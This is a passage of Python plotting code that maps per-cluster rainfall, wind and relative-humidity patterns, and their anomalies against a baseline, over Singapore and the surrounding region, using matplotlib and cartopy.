baseline = np.percentile(RFprec_to_ClusterLabels_dataset.precipitationCal, 90, axis=0)
all_colors = np.vstack(plt.cm.terrain_r(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for 90th percentile RF over SG-only: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
levels = [int(i) for i in np.linspace(-100,100,21)]
for clus in range(optimal_k):
time.sleep(1); gc.collect()
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
mean = np.percentile(data, 90, axis=0)
mean = mean-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts, conts.levels, colors='k', inline=True, fmt='%1.f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Anomaly of 90th percentile RF (in mm) relative to baseline.', orientation='horizontal', pad=0.01,
ticks=levels
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_90th_percentile_SGonly_ANOM_v1_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_rainday_gt1mm_SGonly_ANOM_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting ANOM of proba of >1mm rainfall over SG now.\nTotal of {optimal_k} clusters, now printing cluster: ')
w_lim_sg = 103.5
e_lim_sg = 104.055
s_lim_sg = 1.1
n_lim_sg = 1.55
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon", sgonly=True)
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat", sgonly=True)
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
baseline = get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus="whole", sgonly=True)
all_colors = np.vstack(plt.cm.RdBu(np.linspace(0,1,21)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for rainfall above 1mm, SG-only: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
levels1 = np.linspace(-25,25,101)
levels2 = np.arange(-25, 25.5, 2)
for clus in range(optimal_k):
time.sleep(1); gc.collect()
mean = get_RF_calculations(model, 'gt1mm', calculation='mean', clus=clus, sgonly=True)
mean = mean-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels1,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts,
np.concatenate([levels2[:10], levels2[11:]]),
colors='k', inline=True, fmt='%1.f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Anomaly of gt1mm RF (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01,
ticks = levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_SGonly_ANOM_v3_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_rainday_gt1mm_SGonly_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting proba of >1mm rainfall over SG now.\nTotal of {optimal_k} clusters. ')
w_lim_sg = 103.5
e_lim_sg = 104.055
s_lim_sg = 1.1
n_lim_sg = 1.55
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon', sgonly=True)
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat', sgonly=True)
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
all_colors = np.vstack(plt.cm.RdBu(np.linspace(0,1,21)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Rainfall predictions, SG-only: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
levels1 = np.linspace(0,100,201)
levels2 = np.arange(0, 100.5, 5)
for clus in range(optimal_k):
time.sleep(1); gc.collect()
mean = get_RF_calculations(model, 'gt1mm', calculation='mean', clus=clus, sgonly=True)
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels1,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'y', linewidths=0.02)
ax_rf_plot.clabel(conts,
levels2,
colors='k', inline=True, fmt='%1.f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >1 mm rainfall (%)', orientation='horizontal', pad=0.01,
ticks=levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_SGonly_v3_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_heavy_gt50mm_SGonly_ANOM_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting ANOM proba of >50mm rainfall over SG now.\nTotal of {optimal_k} clusters, now printing cluster: ')
w_lim_sg = 103.5
e_lim_sg = 104.055
s_lim_sg = 1.1
n_lim_sg = 1.55
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon', sgonly=True)
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat', sgonly=True)
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
baseline = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus="whole", sgonly=True)
all_colors = np.vstack(plt.cm.BrBG(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
levels1 = np.linspace(-5,5,81)
levels2 = np.arange(-5, 5.5, .5)
fig.suptitle(f'Anomaly for rainfall above 50mm, SG-only: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
for clus in range(optimal_k):
time.sleep(1); gc.collect()
mean = get_RF_calculations(model, 'gt50mm', calculation='mean', clus=clus, sgonly=True)
mean = mean-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('k')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels1,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts,
np.concatenate([levels2[:10], levels2[11:]]),
colors='k', inline=True, fmt='%1.2f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >50 mm rainfall (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01,
ticks=levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_SGonly_ANOM_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_quiver_Regionalonly(model, dest, optimal_k):
quiverstarttime = timer(); print(f'{utils.time_now()} - Drawing quiver sub-plots over regional now.\nTotal of {optimal_k} clusters, now printing cluster: ')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(lon=slice(w_lim_regional, e_lim_regional),lat=slice(n_lim_regional, s_lim_regional))
area = (e_lim_regional-w_lim_regional)*(n_lim_regional-s_lim_regional)
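# Decimate the wind grid by area so the quiver arrows stay legible: bigger domains
# are sampled more sparsely; minshaft/scale tune arrow geometry for that density.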
coastline_lw = .8
minshaft=2; scale=33
if area > 3000: skip_interval=4
elif 2000 < area <= 3000: skip_interval=3
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
lon = target_ds_withClusterLabels.lon
lat = target_ds_withClusterLabels.lat
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure}hpa...')
fig, gs_qp = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
print(f"{utils.time_now()} - Cluster {cluster}: ")
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
"time")[::skip_interval, ::skip_interval].values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
"time")[::skip_interval, ::skip_interval].values
ax_qp = fig.add_subplot(gs_qp[cluster], projection=ccrs.PlateCarree())
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
ax_qp.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_qp.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_qp.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_qp.xaxis.tick_top()
else: ax_qp.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_qp.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
else: ax_qp.set_yticks([])
if cluster == 0: # title
ax_qp.set_title(f"Pressure: {pressure} hpa for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_qp.set_title(f"cluster no.{cluster+1}", loc='left')
time.sleep(1); gc.collect()
wndspd = np.hypot(vwnd_gridded_centroids,uwnd_gridded_centroids);
time.sleep(1); gc.collect()
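            # Normalise (u, v) by the wind speed so the quiver shows direction
            # only; magnitude is carried by the filled speed contours below.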
u = uwnd_gridded_centroids/wndspd;
v = vwnd_gridded_centroids/wndspd;
spd_plot = ax_qp.contourf(lon, lat, wndspd, np.linspace(0,18,19),
# spd_plot = ax_qp.contourf(lon_qp, lat_qp, wndspd, np.linspace(0,18,19),
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon, lat, u, v, color='Black', minshaft=minshaft, scale=scale)
# Quiver = ax_qp.quiver(lon_qp, lat_qp, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
time.sleep(1); gc.collect()
if cluster == model.cbar_pos: # cbar
axins_qp = inset_axes(ax_qp, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_qp.transAxes)
                cbar_qp = fig.colorbar(spd_plot, cax=axins_qp, label='Wind speed (m/s)', orientation='horizontal', pad=0.01)
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
print(f"=> Quiver plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_qp_Regionalonly-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nQuiver plotting took {utils.time_since(quiverstarttime)}.\n\n")
def print_quiver_ANOM_Regionalonly(model, dest, optimal_k):
quiverstarttime = timer(); print(f'{utils.time_now()} - Finishing quiver ANOMALY plots (regional)...')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(lon=slice(w_lim_regional, e_lim_regional),lat=slice(n_lim_regional, s_lim_regional))
area = (e_lim_regional-w_lim_regional)*(n_lim_regional-s_lim_regional)
coastline_lw = .8
minshaft=2; scale=33
if area > 3000: skip_interval=4
elif 2000 < area <= 3000: skip_interval=3
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
lon = target_ds_withClusterLabels.lon
lat = target_ds_withClusterLabels.lat
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
levels = [int(i) for i in np.linspace(-10,10,21)]
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure}hpa...')
fig, gs_qp = create_multisubplot_axes(optimal_k)
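        # Baseline = mean wind over all days at this pressure level; each
        # cluster's anomaly below is (cluster mean - baseline).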
uwnd_baseline = target_ds_withClusterLabels.sel(level=pressure).uwnd.mean("time")
vwnd_baseline = target_ds_withClusterLabels.sel(level=pressure).vwnd.mean("time")
for cluster in range(optimal_k):
print(f"{utils.time_now()} - Cluster {cluster}: ")
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
"time")[::skip_interval, ::skip_interval].values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
"time")[::skip_interval, ::skip_interval].values
uwnd_mean = uwnd_gridded_centroids - uwnd_baseline
vwnd_mean = vwnd_gridded_centroids - vwnd_baseline
ax_qp = fig.add_subplot(gs_qp[cluster], projection=ccrs.PlateCarree())
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
ax_qp.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_qp.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_qp.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_qp.xaxis.tick_top()
else: ax_qp.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_qp.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
else: ax_qp.set_yticks([])
if cluster == 0: # title
ax_qp.set_title(f"Pressure: {pressure} hpa for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_qp.set_title(f"cluster no.{cluster+1}", loc='left')
time.sleep(1); gc.collect()
wndspd = np.hypot(vwnd_mean,uwnd_mean);
u = uwnd_mean/wndspd;
v = vwnd_mean/wndspd;
spd_plot = ax_qp.contourf(lon, lat, wndspd, levels,
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon, lat, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
time.sleep(1); gc.collect()
if cluster == model.cbar_pos: # cbar
axins_qp = inset_axes(ax_qp, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_qp.transAxes)
                cbar_qp = fig.colorbar(spd_plot, cax=axins_qp, label='Wind speed anomaly (m/s)', orientation='horizontal', pad=0.01,
ticks=levels)
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
print(f"=> Quiver ANOMALY plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_qp_Regionalonly_ANOM-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nQuiver ANOMALY plotting took {utils.time_since(quiverstarttime)}.\n\n")
def print_RHUM_Regionalonly(model, dest, optimal_k):
rhumstarttime = timer(); print(f"{utils.time_now()} - Finishing RHUM plots (regional)...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(lon=slice(w_lim_regional, e_lim_regional),lat=slice(n_lim_regional, s_lim_regional))
lon = target_ds_withClusterLabels.lon
lat = target_ds_withClusterLabels.lat
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
for idx, pressure in enumerate(model.rhum_pressure_levels):
fig, gs_rhum = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).rhum.mean("time")
ax_rhum = fig.add_subplot(gs_rhum[cluster], projection=ccrs.PlateCarree())
ax_rhum.xaxis.set_major_formatter(model.lon_formatter)
ax_rhum.yaxis.set_major_formatter(model.lat_formatter)
ax_rhum.coastlines("50m", linewidth=.7, color='w')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='w', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='k')
ax_rhum.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_rhum.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_rhum.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_rhum.xaxis.tick_top()
else: ax_rhum.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_rhum.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
else: ax_rhum.set_yticks([])
if cluster == 0: # title
ax_rhum.set_title(f"Pressure: {pressure} hpa, for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_rhum.set_title(f"cluster no.{cluster+1}", loc='left')
normi = mpl.colors.Normalize(vmin=model.min_maxes['rhum_min'], vmax=model.min_maxes['rhum_max']);
Rhum = ax_rhum.contourf(lon, lat, rhum_gridded_centroids,
np.linspace(model.min_maxes['rhum_min'], model.min_maxes['rhum_max'], 21),
norm=normi, cmap='jet_r')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
if cluster == model.cbar_pos: # cbar
axins_rhum = inset_axes(ax_rhum, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rhum.transAxes);
cbar_rhum = fig.colorbar(Rhum, cax=axins_rhum, label='Relative humidity (%)', orientation='horizontal', pad=0.01);
cbar_rhum.ax.xaxis.set_ticks_position('top')
cbar_rhum.ax.xaxis.set_label_position('top')
print(f"{utils.time_now()} - clus {cluster}")
print(f"==> Rhum plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_rhum_Regionalonly-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nTime taken to plot RHUM: {utils.time_since(rhumstarttime)}.")
def print_RHUM_ANOM_Regionalonly(model, dest, optimal_k):
rhumstarttime = timer(); print(f"{utils.time_now()} - Finishing RHUM ANOMALY plots (regional)...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(lon=slice(w_lim_regional, e_lim_regional),lat=slice(n_lim_regional, s_lim_regional))
lon = target_ds_withClusterLabels.lon
lat = target_ds_withClusterLabels.lat
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
levels = [int(i) for i in np.linspace(-40,40,24)]
for idx, pressure in enumerate(model.rhum_pressure_levels):
fig, gs_rhum = create_multisubplot_axes(optimal_k)
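        # Baseline RHUM = mean over all days at this pressure level; cluster
        # anomalies (cluster mean - baseline) are drawn on a diverging scale.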
baseline = target_ds_withClusterLabels.sel(level=pressure).rhum.mean("time")
for cluster in range(optimal_k):
print(f"{utils.time_now()} - clus {cluster}")
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).rhum.mean("time")
mean = rhum_gridded_centroids-baseline
ax_rhum = fig.add_subplot(gs_rhum[cluster], projection=ccrs.PlateCarree())
ax_rhum.xaxis.set_major_formatter(model.lon_formatter)
ax_rhum.yaxis.set_major_formatter(model.lat_formatter)
ax_rhum.coastlines("50m", linewidth=.7, color='k')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='k')
ax_rhum.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_rhum.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_rhum.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_rhum.xaxis.tick_top()
else: ax_rhum.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_rhum.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
else: ax_rhum.set_yticks([])
if cluster == 0: # title
ax_rhum.set_title(f"Anomalous RHUM, @ Pressure: {pressure}hpa, for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_rhum.set_title(f"cluster no.{cluster+1}", loc='left')
Rhum = ax_rhum.contourf(lon, lat, mean,
# np.linspace(model.min_maxes['rhum_min'], model.min_maxes['rhum_max'], 21),
levels, cmap='BrBG', extend='both')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
if cluster == model.cbar_pos: # cbar
